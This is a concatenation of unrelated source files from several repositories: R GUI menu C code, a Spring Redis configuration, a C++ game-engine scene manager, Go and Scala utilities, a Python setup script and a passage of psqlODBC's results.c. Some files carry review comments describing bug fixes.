    for (i = 0; i < nmenus; i++) {
	SET_STRING_ELT(menuNames, i, mkChar(getusermenuname(i)));
    }

    UNPROTECT(1);
    return(menuNames);
}
/* winMenuItems(menuname): returns a named character vector of a user menu's
   items — values are the item actions, names are the item labels. */
SEXP winMenuItems(SEXP call, SEXP op, SEXP args, SEXP env)
{
    SEXP mname, ans, ansnames;
    menuItems *items;
    char errmsg[50];
    int i;

    args = CDR(args);
    if (CharacterMode != RGui)
	errorcall(call, _("menu functions can only be used in the GUI"));

    mname = CAR(args);
    if (!isString(mname) || length(mname) != 1)
	error(_("invalid '%s' argument"), "menuname");

    items = wingetmenuitems(translateChar(STRING_ELT(mname,0)), errmsg);
    if (items->numItems == 0) {
	snprintf(msgbuf, 256, _("unable to retrieve items for %s (%s)"),
		 translateChar(STRING_ELT(mname,0)), errmsg);
	freemenuitems(items);
	/* BUGFIX: msgbuf contains user-supplied text (the menu name); pass it
	   as an argument, not as the format string, so stray '%' characters
	   cannot be misinterpreted by errorcall(). */
	errorcall(call, "%s", msgbuf);
    }

    PROTECT(ans = allocVector(STRSXP, items->numItems));
    PROTECT(ansnames = allocVector(STRSXP, items->numItems));
    for (i = 0; i < items->numItems; i++) {
	SET_STRING_ELT(ans, i, mkChar(items->mItems[i]->action));
	SET_STRING_ELT(ansnames, i, mkChar(items->mItems[i]->name));
    }
    setAttrib(ans, R_NamesSymbol, ansnames);
    freemenuitems(items);
    UNPROTECT(2);
    return(ans);
}
/* winMenuAdd(menuname, itemname, action): adds a whole menu when itemname is
   NULL, otherwise adds one item (with its action string) to the given menu. */
SEXP winMenuAdd(SEXP call, SEXP op, SEXP args, SEXP env)
{
    SEXP smenu, sitem;
    int res;
    char errmsg[50];

    args = CDR(args);
    if (CharacterMode != RGui)
	errorcall(call, _("menu functions can only be used in the GUI"));
    smenu = CAR(args);
    if(!isString(smenu) || length(smenu) != 1)
	error(_("invalid '%s' argument"), "menuname");
    sitem = CADR(args);
    if (isNull(sitem)) { /* add a menu */
	res = winaddmenu (translateChar(STRING_ELT(smenu, 0)), errmsg);
	if (res > 0) {
	    snprintf(msgbuf, 256, _("unable to add menu (%s)"), errmsg);
	    /* BUGFIX: pass msgbuf as an argument, not as the format string,
	       so '%' in errmsg cannot be misinterpreted by errorcall(). */
	    errorcall(call, "%s", msgbuf);
	}

    } else { /* add an item */
	if(!isString(sitem) || length(sitem) != 1)
	    error(_("invalid '%s' argument"), "itemname");
	res = winaddmenuitem (translateChar(STRING_ELT(sitem, 0)),
			      translateChar(STRING_ELT(smenu, 0)),
			      translateChar(STRING_ELT(CADDR(args), 0)),
			      errmsg);
	if (res > 0) {
	    snprintf(msgbuf, 256, _("unable to add menu item (%s)"), errmsg);
	    /* BUGFIX: as above — never use a user-influenced buffer as the
	       format string. */
	    errorcall(call, "%s", msgbuf);
	}
    }
    return (R_NilValue);
}
/* winMenuDel(menuname, itemname): deletes a whole menu when itemname is NULL,
   otherwise deletes one item from the given menu. */
SEXP winMenuDel(SEXP call, SEXP op, SEXP args, SEXP env)
{
    SEXP smenu, sitem;
    int res;
    char errmsg[50];

    args = CDR(args);
    if (CharacterMode != RGui)
	errorcall(call, _("menu functions can only be used in the GUI"));
    smenu = CAR(args);
    if(!isString(smenu) || length(smenu) != 1)
	error(_("invalid '%s' argument"), "menuname");
    sitem = CADR(args);
    if (isNull(sitem)) { /* delete a menu */
	res = windelmenu (translateChar(STRING_ELT(smenu, 0)), errmsg);
	if (res > 0)
	    errorcall(call, _("menu does not exist"));
    } else { /* delete an item */
	if(!isString(sitem) || length(sitem) != 1)
	    error(_("invalid '%s' argument"), "itemname");
	res = windelmenuitem (translateChar(STRING_ELT(sitem, 0)),
			      translateChar(STRING_ELT(smenu, 0)), errmsg);
	if (res > 0) {
	    snprintf(msgbuf, 256, _("unable to delete menu item (%s)"), errmsg);
	    /* BUGFIX: pass msgbuf as an argument, not as the format string,
	       so '%' in errmsg cannot be misinterpreted by errorcall(). */
	    errorcall(call, "%s", msgbuf);
	}
    }
    return (R_NilValue);
}
|
naboxwallet/nabox
|
nabox-common/src/main/java/io/nabox/common/config/RedisConfig.java
|
<reponame>naboxwallet/nabox<gh_stars>10-100
/**
* Copyright (c) 2016-2019 Nabox开源 All rights reserved.
*
* https://www.renren.io
*
* 版权所有,侵权必究!
*/
package io.nabox.common.config;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.data.redis.connection.RedisConnectionFactory;
import org.springframework.data.redis.core.RedisTemplate;
import org.springframework.data.redis.serializer.JdkSerializationRedisSerializer;
import org.springframework.data.redis.serializer.StringRedisSerializer;
/**
* Redis配置
*
* @author Mark <EMAIL>
*/
@Configuration
public class RedisConfig {

    /**
     * Redis template using plain-string serialization for keys, hash keys and
     * hash values, and JDK serialization for top-level values.
     *
     * @param redisConnectionFactory connection factory supplied by Spring
     * @return fully configured {@code RedisTemplate}
     */
    @Bean
    public RedisTemplate<String, Object> redisTemplate(RedisConnectionFactory redisConnectionFactory) {
        final StringRedisSerializer stringSerializer = new StringRedisSerializer();

        final RedisTemplate<String, Object> template = new RedisTemplate<>();
        template.setConnectionFactory(redisConnectionFactory);
        template.setKeySerializer(stringSerializer);
        template.setHashKeySerializer(stringSerializer);
        template.setHashValueSerializer(stringSerializer);
        template.setValueSerializer(new JdkSerializationRedisSerializer());
        return template;
    }
}
|
markitus18/Thor-Engine
|
ThorEngine/Source Code/M_SceneManager.cpp
|
#include "M_SceneManager.h"
#include "Engine.h"
#include "Globals.h"
#include "Intersections.h"
#include "Config.h"
#include "Quadtree.h"
#include "Time.h"
#include "M_Camera3D.h"
#include "M_Input.h"
#include "I_Scenes.h"
#include "M_Editor.h"
#include "M_Renderer3D.h"
#include "M_FileSystem.h"
#include "M_Resources.h"
#include "GameObject.h"
#include "R_Scene.h"
#include "R_Model.h"
#include "R_Mesh.h"
#include "C_Mesh.h"
#include "C_Transform.h"
#include "C_Camera.h"
#include <windows.h>
#include <shobjidl.h>
// Module registered under the name "Scene"; actual scene data is loaded
// later through LoadScene().
M_SceneManager::M_SceneManager(bool start_enabled) : Module("Scene", start_enabled)
{
}

// NOTE(review): `quadtree` (allocated in Init) is not deleted here — confirm
// whether ownership is released elsewhere or this is a leak at shutdown.
M_SceneManager::~M_SceneManager()
{
}
// Creates the static-geometry quadtree with hard-coded world bounds
// (±80 on X/Z, ±30 on Y). NOTE(review): magic bounds — static objects placed
// outside this box presumably fail to register in the quadtree; confirm.
bool M_SceneManager::Init(Config& config)
{
	quadtree = new Quadtree(AABB(vec(-80, -30, -80), vec(80, 30, 80)));
	return true;
}
// Start: module start-up hook; currently only logs — no assets are actually
// loaded here despite the message.
bool M_SceneManager::Start()
{
	LOG("Loading Intro assets");
	bool ret = true;
	return ret;
}
// CleanUp: module shutdown hook; currently only logs. NOTE(review): scene
// objects are not freed here — presumably DeleteAllGameObjects / resource
// handles cover it; confirm.
bool M_SceneManager::CleanUp()
{
	LOG("Unloading scene");
	return true;
}
// Root GameObject of the currently loaded scene resource.
GameObject* M_SceneManager::GetRoot()
{
	return hCurrentScene.Get()->root;
}

// Const overload of the root accessor above.
const GameObject* M_SceneManager::GetRoot() const
{
	return hCurrentScene.Get()->root;
}
// Update: per-frame pass — debug file-dialog hotkey, hierarchy update,
// rendering (frustum-culled when a culling camera exists) and the optional
// quadtree debug draw.
update_status M_SceneManager::Update()
{
#pragma region WindowTest
	// Debug helper: pressing K opens a native Win32 file-open dialog.
	if (Engine->input->GetKey(SDL_SCANCODE_K) == KEY_DOWN)
	{
		HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED |
			COINIT_DISABLE_OLE1DDE);
		if (SUCCEEDED(hr))
		{
			IFileOpenDialog* pFileOpen = nullptr;

			// Create the FileOpenDialog object.
			hr = CoCreateInstance(CLSID_FileOpenDialog, NULL, CLSCTX_ALL,
				IID_IFileOpenDialog, reinterpret_cast<void**>(&pFileOpen));

			if (SUCCEEDED(hr))
			{
				// Show the Open dialog box.
				hr = pFileOpen->Show(NULL);
				pFileOpen->Release(); // BUGFIX: interface was previously leaked
			}
			CoUninitialize(); // BUGFIX: balance CoInitializeEx (was never called)
		}
	}
#pragma endregion

	UpdateAllGameObjects(GetRoot(), Time::deltaTime);

	if (Engine->renderer3D->culling_camera)
	{
		// Gather static candidates from the quadtree, then frustum-test both
		// the static candidates and every dynamic (non-static) object.
		std::vector<const GameObject*> candidates;
		quadtree->CollectCandidates(candidates, Engine->renderer3D->culling_camera->frustum);

		std::vector<const GameObject*> gameObjects;
		TestGameObjectsCulling(candidates, gameObjects);
		TestGameObjectsCulling(nonStatic, gameObjects);

		for (uint i = 0; i < gameObjects.size(); i++)
		{
			// BUGFIX: a stray ';' used to terminate this 'if', making the
			// root check a no-op so the draw ran unconditionally.
			if (gameObjects[i]->name != "root")
				((GameObject*)gameObjects[i])->Draw(true, false, drawBounds, drawBoundsSelected);
		}
		gameObjects.clear();
	}
	else
	{
		DrawAllGameObjects(GetRoot());
	}

	if (drawQuadtree)
		quadtree->Draw();

	return UPDATE_CONTINUE;
}
// PostUpdate: destroys the GameObjects queued by DeleteGameObject() once the
// frame's update/draw passes can no longer reference them.
update_status M_SceneManager::PostUpdate()
{
	DeleteToRemoveGameObjects();
	return UPDATE_CONTINUE;
}
// Returns `name`, suffixed with " (n)" when n siblings under `parent` already
// use that name, so newly created objects get unique display names.
std::string M_SceneManager::GetNewGameObjectName(const char* name, const GameObject* parent) const
{
	std::string uniqueName(name);
	const uint existing = GetGameObjectNameCount(name, parent);
	if (existing > 0)
	{
		uniqueName.append(" (").append(std::to_string(existing)).append(")");
	}
	return uniqueName;
}
// Counts how many children of `parent` (scene root when null) already use
// `name`, following the "name", "name (1)", "name (2)", ... sequence; the
// returned count is the next free suffix.
int M_SceneManager::GetGameObjectNameCount(const char* name, const GameObject* parent) const
{
	if (parent == nullptr) parent = GetRoot();
	if (parent->childs.size() == 0) return 0;

	// (Removed an unused std::vector<GameObject*>::iterator local and
	// untangled the assignment-inside-if from the original.)
	uint count = 0;
	bool found = false;
	do
	{
		std::string nameStr = name;
		if (count > 0)
		{
			nameStr.append(" (").append(std::to_string(count)).append(")");
		}
		found = parent->FindChildByName(nameStr.c_str());
		if (found)
		{
			++count;
		}
	} while (found == true);

	return count;
}
// SaveConfig: no scene settings are persisted yet; kept for the module API.
void M_SceneManager::SaveConfig(Config& config) const
{
}
// Moves a GameObject between the static set (quadtree-indexed) and the
// dynamic set (`nonStatic` vector). Making an object static also makes all
// its ancestors up to (but excluding) the root static, so the quadtree holds
// complete static chains; making it dynamic only moves this object. With
// `allChilds`, the change cascades to every descendant.
void M_SceneManager::SetStaticGameObject(GameObject* gameObject, bool isStatic, bool allChilds)
{
	if (gameObject->isStatic != isStatic)
	{
		gameObject->SetStatic(isStatic);
		if (isStatic == true)
		{
			// Propagate the static flag upwards (non-recursive on children).
			GameObject* it = gameObject->parent;
			while (it != nullptr && it->name != "root")
			{
				SetStaticGameObject(it, isStatic, false);
				it = it->parent;
			}
			quadtree->AddGameObject(gameObject);
			// The quadtree owns it now; drop it from the dynamic list.
			for (std::vector<const GameObject*>::iterator it = nonStatic.begin(); it != nonStatic.end(); it++)
			{
				if ((*it) == gameObject)
				{
					nonStatic.erase(it);
					break;
				}
			}
		}
		else
		{
			quadtree->RemoveGameObject(gameObject);
			nonStatic.push_back(gameObject);
		}
	}
	if (allChilds)
	{
		for (uint i = 0; i < gameObject->childs.size(); i++)
		{
			SetStaticGameObject(gameObject->childs[i], isStatic, allChilds);
		}
	}
}
// LoadConfig: no scene settings are read yet; kept for the module API.
void M_SceneManager::LoadConfig(Config& config)
{
}
// Loads a scene by asset path. Returns the resource ID that was loaded, or 0
// when no resource matches `file`.
// BUGFIX: FindResourceBase() was dereferenced unconditionally, crashing when
// the file was unknown; a null check is now performed first. (LoadScene(0) is
// already a no-op in the ID overload, so returning 0 is consistent.)
uint64 M_SceneManager::LoadScene(const char* file)
{
	auto* resourceBase = Engine->moduleResources->FindResourceBase(file);
	if (resourceBase == nullptr)
	{
		LOG("[error] Could not find a resource for scene file '%s'", file);
		return 0;
	}

	uint64 newID = resourceBase->ID;
	LoadScene(newID);
	return newID;
}
// Loads a scene resource by ID: tears down the current scene, rebinds the
// scene handle (forcing the resource to load) and re-registers every new
// GameObject in either the quadtree (static) or the nonStatic list.
void M_SceneManager::LoadScene(uint64 resourceID)
{
	if (resourceID != 0)
	{
		DeleteAllGameObjects();
		quadtree->Clear();
		hCurrentScene.Set(resourceID); hCurrentScene.Get(); //<-- 'Get' So the resource gets loaded

		std::vector<GameObject*> newGameObjects;
		GetRoot()->CollectChilds(newGameObjects);

		for (uint i = 0; i < newGameObjects.size(); i++)
		{
			if (newGameObjects[i]->isStatic)
			{
				quadtree->AddGameObject(newGameObjects[i]);
			}
			else
			{
				nonStatic.push_back(newGameObjects[i]);
			}
		}
	}
}
// Instantiates a model resource into the current scene: reparents the model's
// root under the scene root and registers all its children as dynamic objects.
// The resource handle is scoped to this function, so the model resource is
// released when it returns.
void M_SceneManager::LoadModel(uint64 modelID)
{
	std::vector<GameObject*> newGameObjects;

	//Resource handle will be deleted at the end of the function and the resource will be freed
	ResourceHandle<R_Model> rModelHandle(modelID);

	R_Model* model = rModelHandle.Get();
	if (model != nullptr)
	{
		//Port each model children into the current scene
		model->root->SetParent(GetRoot());

		//Add all gameObject's children to the static vector
		model->root->CollectChilds(newGameObjects);
		for (uint i = 0; i < newGameObjects.size(); i++)
		{
			nonStatic.push_back(newGameObjects[i]);
		}
		newGameObjects.clear();
	}
	else
	{
		// BUGFIX: the previous message contained a '%s' with no matching
		// argument (undefined behaviour in the formatter); the message no
		// longer uses a format specifier.
		LOG("[error] Model resource could not be loaded");
	}
}
// Creates an empty GameObject named `name`, parented to `parent` (or to the
// scene root when parent is null), and assigns it a fresh random UID.
GameObject* M_SceneManager::CreateGameObject(const char* name, GameObject* parent)
{
	GameObject* effectiveParent = (parent != nullptr) ? parent : GetRoot();
	GameObject* created = new GameObject(effectiveParent, name);
	created->uid = random.Int();
	return created;
}
// Queues `gameObject` — and, recursively, all its children — for destruction
// in PostUpdate. Idempotent per object: an already-queued object is skipped.
void M_SceneManager::DeleteGameObject(GameObject* gameObject)
{
	for (uint i = 0; i < toRemove.size(); i++)
	{
		if (toRemove[i] == gameObject)
			return;
	}

	toRemove.push_back(gameObject);
	Engine->OnRemoveGameObject(gameObject);

	while (gameObject->childs.empty() == false) //"OnRemoveGameObject" will remove the gameObject from the childs list
	{
		DeleteGameObject(gameObject->childs[0]);
	}
}
// Engine callback when a GameObject is being removed: detaches it from the
// spatial bookkeeping (quadtree or nonStatic list) and from its parent's
// child list. Warns if it was tracked in neither container.
void M_SceneManager::OnRemoveGameObject(GameObject* gameObject)
{
	//Remove from quadtree // non-static vector
	if (quadtree->RemoveGameObject(gameObject) == false)
	{
		bool erased = false;
		for (std::vector<const GameObject*>::iterator it = nonStatic.begin(); it != nonStatic.end(); it++)
		{
			if (*it == gameObject)
			{
				nonStatic.erase(it);
				erased = true;
				break;
			}
		}
		if (erased == false)
			LOG("[warning] deleted GameObject not found in quadtree nor non-static vector");
	}

	//Removing parent child
	if (gameObject->parent)
	{
		GameObject* parent = gameObject->parent;
		for (std::vector<GameObject*>::iterator it = parent->childs.begin(); it != parent->childs.end();)
		{
			*it == gameObject ? it = parent->childs.erase(it) : it++;
		}
	}
}
// Mouse-pick selection: collects candidates hit by the picking ray (quadtree
// statics plus dynamics, ordered by near-hit distance in a map), then refines
// each candidate triangle-by-triangle in its local space; the first candidate
// with an actual triangle hit becomes the selection (nullptr deselects).
void M_SceneManager::OnClickSelection(const LineSegment& segment)
{
	//Collecting quadtree GameObjects
	std::map<float, const GameObject*> candidates;
	quadtree->CollectCandidates(candidates, segment);

	//Collecting non-static GameObjects
	for (uint i = 0; i < nonStatic.size(); i++)
	{
		if (segment.Intersects(nonStatic[i]->GetAABB()))
		{
			float hit_near, hit_far;
			if (segment.Intersects(nonStatic[i]->GetOBB(), hit_near, hit_far))
				candidates[hit_near] = nonStatic[i];
		}
	}

	const GameObject* toSelect = nullptr;
	// Map iteration is ordered by hit_near, so nearer candidates win.
	for (std::map<float, const GameObject*>::iterator it = candidates.begin(); it != candidates.end() && toSelect == nullptr; it++)
	{
		//Testing triangle by triangle
		const Component* mesh = it->second->GetComponent<C_Mesh>();
		if (mesh)
		{
			const R_Mesh* rMesh = ((C_Mesh*)mesh)->rMeshHandle.Get();
			if (rMesh)
			{
				// Transform the ray into the mesh's local space once, instead
				// of transforming every triangle into world space.
				LineSegment local = segment;
				local.Transform(it->second->GetComponent<C_Transform>()->GetGlobalTransform().Inverted());
				for (uint v = 0; v < rMesh->buffersSize[R_Mesh::b_indices]; v += 3)
				{
					uint indexA = rMesh->indices[v] * 3;
					vec a(&rMesh->vertices[indexA]);

					uint indexB = rMesh->indices[v + 1] * 3;
					vec b(&rMesh->vertices[indexB]);

					uint indexC = rMesh->indices[v + 2] * 3;
					vec c(&rMesh->vertices[indexC]);

					Triangle triangle(a, b, c);
					if (local.Intersects(triangle, nullptr, nullptr))
					{
						toSelect = it->second;
						break;
					}
				}
			}
		}
	}
	Engine->moduleEditor->SelectSingle((GameObject*)toSelect);
}
// Creates a camera GameObject at (10, 10, 0) looking at (0, 5, 0), assigns it
// a fresh UID, and registers it as the scene's main camera.
GameObject* M_SceneManager::CreateCamera()
{
	GameObject* camera = new GameObject(GetRoot(), "Camera");
	camera->GetComponent<C_Transform>()->SetPosition(float3(10, 10, 0));
	camera->CreateComponent(Component::Type::Camera);
	camera->GetComponent<C_Camera>()->Look(float3(0, 5, 0));
	camera->uid = random.Int();

	//Keeping a reference to the last camera, by now
	hCurrentScene.Get()->mainCamera = camera->GetComponent<C_Camera>();
	return camera;
}
// The scene's main camera (the last one registered by CreateCamera).
const C_Camera* M_SceneManager::GetMainCamera() const
{
	return hCurrentScene.Get()->mainCamera;
}
// Enters play mode: starts game time at 60 FPS and snapshots the scene to
// "Engine/tmp.scene" so Stop() can restore the pre-play state.
void M_SceneManager::Play()
{
	Time::Start(60);
	Engine->moduleResources->SaveResourceAs(hCurrentScene.Get(), "Engine", "tmp.scene");
}
// Exits play mode: reloads the tmp.scene snapshot and grafts its restored
// root back onto the original scene resource, keeping that resource alive by
// bumping its instance count before LoadScene swaps the handle away from it.
void M_SceneManager::Stop()
{
	Time::Stop();
	R_Scene* realScene = hCurrentScene.Get();
	realScene->instances++; //Increasing instances just in case. LoadScene will release one instance as the resource is changed

	LoadScene("Engine/tmp.scene");
	// Steal the freshly loaded root for the original resource, then clear it
	// on the temp scene so the hierarchy is not freed twice.
	realScene->root = hCurrentScene.Get()->root;
	hCurrentScene.Get()->root = nullptr;
	hCurrentScene.Set(realScene);
}
// Drops the handle held in `activeScenes` for `sceneID` (first match only),
// releasing that scene's reference. No-op when the ID is not tracked.
void M_SceneManager::ClearScene(uint64 sceneID)
{
	for (auto it = activeScenes.begin(); it != activeScenes.end(); ++it)
	{
		if (it->GetID() == sceneID)
		{
			activeScenes.erase(it);
			return;
		}
	}
}
// Appends to `final` every object in `vector` whose AABB intersects the
// culling camera's frustum.
void M_SceneManager::TestGameObjectsCulling(std::vector<const GameObject*>& vector, std::vector<const GameObject*>& final)
{
	for (const GameObject* candidate : vector)
	{
		if (Engine->renderer3D->culling_camera->frustum.Intersects(candidate->GetAABB()))
		{
			final.push_back(candidate);
		}
	}
}
// Updates the hierarchy rooted at `gameObject`.
// BUGFIX: the parameter was previously ignored and the scene root was always
// updated instead; since the only visible call site passes GetRoot(), using
// the parameter is behaviour-preserving while honouring the signature.
// NOTE(review): assumes GameObject::Update(dt) recurses into children, as the
// original GetRoot()->Update(dt) call implied — confirm.
void M_SceneManager::UpdateAllGameObjects(GameObject* gameObject, float dt)
{
	gameObject->Update(dt);
}
// Recursively draws the hierarchy rooted at `gameObject`, skipping the root
// object itself.
void M_SceneManager::DrawAllGameObjects(GameObject* gameObject)
{
	// BUGFIX: a stray ';' used to terminate this 'if', making the root check
	// a no-op so the draw call ran unconditionally.
	if (gameObject->name != "root")
		gameObject->Draw(true, false, drawBounds, drawBoundsSelected);

	for (uint i = 0; i < gameObject->childs.size(); i++)
	{
		DrawAllGameObjects(gameObject->childs[i]);
	}
}
// Depth-first search for the GameObject with UID `id` under `gameObject`,
// written through `*ret`. Deliberately keeps scanning after a match so UID
// collisions are detected and logged.
void M_SceneManager::FindGameObjectByID(uint id, GameObject* gameObject, GameObject** ret)
{
	if (gameObject->uid == id)
	{
		if (*ret != nullptr)
			LOG("[error] Conflict: GameObjects with same UID");
		*ret = gameObject;
	}

	//Optimization vs security: if ret != nullptr we can stop searching
	//If we search for all game objects, we can find uid conflicts if any
	for (uint i = 0; i < gameObject->childs.size(); i++)
	{
		FindGameObjectByID(id, gameObject->childs[i], ret);
	}
}
// Destroys the whole hierarchy of the current scene (if one is loaded) by
// releasing its root; RELEASE presumably deletes and nulls the pointer.
void M_SceneManager::DeleteAllGameObjects()
{
	if (hCurrentScene.GetID())
		RELEASE(hCurrentScene.Get()->root);
}
void M_SceneManager::DeleteToRemoveGameObjects()
{
for (std::vector<GameObject*>::iterator it = toRemove.begin(); it != toRemove.end(); it++)
{
RELEASE(*it);
}
toRemove.clear();
}
|
entropyio/go-entropy
|
database/memorydb/memorydb_test.go
|
<filename>database/memorydb/memorydb_test.go
package memorydb
import (
"testing"
)
// TestMemoryDB runs the shared key-value database test-suite against a fresh
// in-memory database instance.
// NOTE(review): `dbtest` and `ethdb` are referenced but not imported — only
// "testing" is — so this file cannot compile as written. Confirm the intended
// import paths for this repository and add them to the import block.
func TestMemoryDB(t *testing.T) {
	t.Run("DatabaseSuite", func(t *testing.T) {
		dbtest.TestDatabaseSuite(t, func() ethdb.KeyValueStore {
			return New()
		})
	})
}
|
zichuan-scott-xu/automl-workflow
|
examples/automl_freiburg/ASlibScenario/setup.py
|
import os  # NOTE(review): unused here, kept to avoid breaking anything relying on it
import setuptools

# Runtime dependencies for reading ASlib scenarios.
requirements = ['numpy', 'scipy', 'pyyaml', 'liac-arff', 'pandas']

setuptools.setup(
    name="aslib_scenario",
    version="1.0.0",
    author="<NAME>",
    author_email="<EMAIL>",
    description=("Python Package to read scenario from the algorithm selection library"),
    license="2-clause BSD",
    # BUGFIX: keyword was previously misspelled as "algortithm selection".
    keywords="algorithm selection",
    url="",
    packages=setuptools.find_packages(exclude=['test', 'source']),
    classifiers=[
        "Development Status :: 3 - Alpha",
        "Topic :: Utilities",
        "Topic :: Scientific/Engineering",
        "Topic :: Scientific/Engineering :: Artificial Intelligence",
        # NOTE(review): not an official Trove classifier; PyPI expects
        # "License :: OSI Approved :: BSD License" — confirm before publishing.
        "License :: OSI Approved :: 2-clause BSD",
    ],
    platforms=['Linux'],
    install_requires=requirements,
    tests_require=['mock',
                   'nose'],
    test_suite='nose.collector'
)
|
sfwn/go-utils
|
errorx/multi_error.go
|
package errorx
import (
"bytes"
"fmt"
)
// MultiError is an aggregate of several errors that itself implements error.
type MultiError interface {
	error
	Num() int // number of collected errors
	// MaybeUnwrap returns nil, the single error, or the collection itself,
	// depending on how many errors are held.
	MaybeUnwrap() error
}

// Errors is a slice of errors implementing the error interface.
type Errors []error
// NewMultiError collects the non-nil entries of errs into a MultiError.
func NewMultiError(errs ...error) MultiError {
	filtered := make(Errors, 0, len(errs))
	for _, e := range errs {
		if e == nil {
			continue
		}
		filtered = append(filtered, e)
	}
	return filtered
}
// Error renders the collection: the empty string for no errors, the sole
// error's message for one, and a "%d error(s) occurred:" bullet list otherwise.
func (errs Errors) Error() string {
	switch len(errs) {
	case 0:
		return ""
	case 1:
		return errs[0].Error()
	}

	var buf bytes.Buffer
	fmt.Fprintf(&buf, "%d error(s) occurred:", len(errs))
	for _, e := range errs {
		fmt.Fprintf(&buf, "\n* %s", e)
	}
	return buf.String()
}
// Num reports how many errors are in the collection.
func (errs Errors) Num() int {
	return len(errs)
}
// Append adds err to the collection in place.
// NOTE(review): unlike NewMultiError, nil errors are NOT filtered here —
// confirm whether that asymmetry is intended.
// (Removed the redundant bare `return` at the end of the function.)
func (errs *Errors) Append(err error) {
	*errs = append(*errs, err)
}
// MaybeUnwrap simplifies the collection for returning: nil when empty, the
// sole contained error when there is exactly one, and the Errors value itself
// otherwise. This lets callers build an Errors unconditionally and only pay
// for the wrapper when it is actually needed.
func (errs Errors) MaybeUnwrap() error {
	if len(errs) == 0 {
		return nil
	}
	if len(errs) == 1 {
		return errs[0]
	}
	return errs
}
|
ankurqss2009/AUSK_NEW
|
modules/post/server-scala/src/main/scala/repositories/PostRepository.scala
|
package repositories
import com.byteslounge.slickrepo.repository.Repository
import javax.inject.Inject
import model.{PaginatedResult, Pagination, PaginationParams, Post}
import model.PostTable.PostTable
import slick.ast.BaseTypedType
import slick.jdbc.JdbcProfile
import scala.concurrent.ExecutionContext
/**
 * Slick-backed repository for [[Post]] entities (Int primary key) with
 * offset/limit pagination support mixed in via [[Pagination]].
 */
class PostRepository @Inject()(override val driver: JdbcProfile)(implicit executionContext: ExecutionContext)
  extends Repository[Post, Int](driver)
    with Pagination {

  import driver.api._

  val pkType = implicitly[BaseTypedType[Int]]
  val tableQuery = TableQuery[PostTable]
  type TableType = PostTable

  /**
   * Fetches one page of posts plus paging metadata.
   *
   * Runs two statements in one DBIO: a total count over the whole table and
   * the paginated select; `hasNextPage` is derived from whether rows remain
   * beyond offset + limit.
   */
  def getPaginatedObjectsList(paginationParams: PaginationParams): DBIO[PaginatedResult[Post]] = {
    val (offset, limit) = (paginationParams.offset, paginationParams.limit)
    val paginatedQuery = withPagination(tableQuery, paginationParams)
    for {
      totalCount <- tableQuery.size.result
      paginatedResult <- paginatedQuery.result
    } yield
      PaginatedResult(
        totalCount = totalCount,
        entities = paginatedResult.toList,
        hasNextPage = (totalCount - (offset + limit)) > 0
      )
  }
}
|
xlinx69/leasestack
|
public/modules/refinancements/services/refinancements.client.service.js
|
'use strict';
// Refinancements service: $resource wrapper for the refinancements REST
// endpoints, with an extra PUT-based `update` action on top of the defaults.
angular.module('refinancements').factory('Refinancements', ['$resource',
	function($resource) {
		var defaultParams = { refinancementId: '@_id' };
		var customActions = {
			update: {
				method: 'PUT'
			}
		};
		return $resource('refinancements/:refinancementId', defaultParams, customActions);
	}
]);
|
yrj2011/mycrawler
|
mycrawler-tutorial/mycrawler-tutorial-spring/Spring AOP/AOP/aop after throwing advice/aop/src/com/springinaction/springidol/Main.java
|
<reponame>yrj2011/mycrawler
package com.springinaction.springidol;
import org.springframework.context.ApplicationContext;
import org.springframework.context.support.ClassPathXmlApplicationContext;
/**
 * Demo driver for the after-throwing advice example: boots the Spring context
 * from abc.xml and validates one failing age (20) and one passing age (10) on
 * the "performer" bean.
 */
public class Main {

    private static ApplicationContext context;

    public static void main(String[] args) {
        context = new ClassPathXmlApplicationContext("abc.xml");
        Performer performer = (Performer) context.getBean("performer");

        System.out.println("ARTIST ; 1");
        validateQuietly(performer, 20);
        System.out.println("AFTER THROWING ADVICE : Boo! We want our money back!");

        System.out.println("ARTIST ; 2");
        validateQuietly(performer, 10);
    }

    /**
     * Runs validateAge and reports — rather than propagates — any failure.
     * Extracted to remove the duplicated try/catch blocks from main().
     */
    private static void validateQuietly(Performer performer, int age) {
        try {
            performer.validateAge(age);
        } catch (Exception ex) {
            System.out.println("Invalid Artist : " + ex);
        }
    }
}
|
abdalla/docker-image-for-python-boto3-mysql
|
deps/unixODBC-2.3.4/Drivers/Postgre7.1/results.c
|
<gh_stars>0
/* Module: results.c
*
* Description: This module contains functions related to
* retrieving result information through the ODBC API.
*
* Classes: n/a
*
* API functions: SQLRowCount, SQLNumResultCols, SQLDescribeCol, SQLColAttributes,
* SQLGetData, SQLFetch, SQLExtendedFetch,
* SQLMoreResults(NI), SQLSetPos, SQLSetScrollOptions(NI),
* SQLSetCursorName, SQLGetCursorName
*
* Comments: See "notice.txt" for copyright and license information.
*
*/
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include <string.h>
#include "psqlodbc.h"
#include "dlg_specific.h"
#include "environ.h"
#include "connection.h"
#include "statement.h"
#include "bind.h"
#include "qresult.h"
#include "convert.h"
#include "pgtypes.h"
#include <stdio.h>
#ifndef WIN32
#include "isqlext.h"
#else
#include <windows.h>
#include <sqlext.h>
#endif
extern GLOBAL_VALUES globals;
/*
 * SQLRowCount - report the number of rows affected by the last statement.
 *
 * For SELECT statements the count comes from the cached result (unknown, -1,
 * when declare/fetch is in use because the full result is never
 * materialized).  For other statements the count is parsed from the last
 * token of the backend command tag (e.g. "UPDATE 3").
 */
SQLRETURN SQLRowCount(SQLHSTMT hstmt,
                      SQLLEN *pcrow)
{
    static char* const func="SQLRowCount";
    StatementClass *stmt = (StatementClass *) hstmt;
    QResultClass *res;
    char *msg, *ptr;

    if ( ! stmt) {
        SC_log_error(func, "", NULL);
        return SQL_INVALID_HANDLE;
    }

    /* Manually constructed results carry no meaningful row count. */
    if (stmt->manual_result) {
        if (pcrow)
            *pcrow = -1;
        return SQL_SUCCESS;
    }

    if(stmt->statement_type == STMT_TYPE_SELECT) {
        if (stmt->status == STMT_FINISHED) {
            res = SC_get_Result(stmt);
            if(res && pcrow) {
                *pcrow = globals.use_declarefetch ? -1 : QR_get_num_tuples(res);
                return SQL_SUCCESS;
            }
        }
    } else {
        res = SC_get_Result(stmt);
        if (res && pcrow) {
            msg = QR_get_command(res);
            /* BUGFIX: guard against a missing command tag; the original code
             * passed msg straight to trim()/strrchr() and would dereference
             * NULL if the backend supplied no command string. */
            if (msg) {
                mylog("*** msg = '%s'\n", msg);
                trim(msg); /* get rid of trailing spaces */
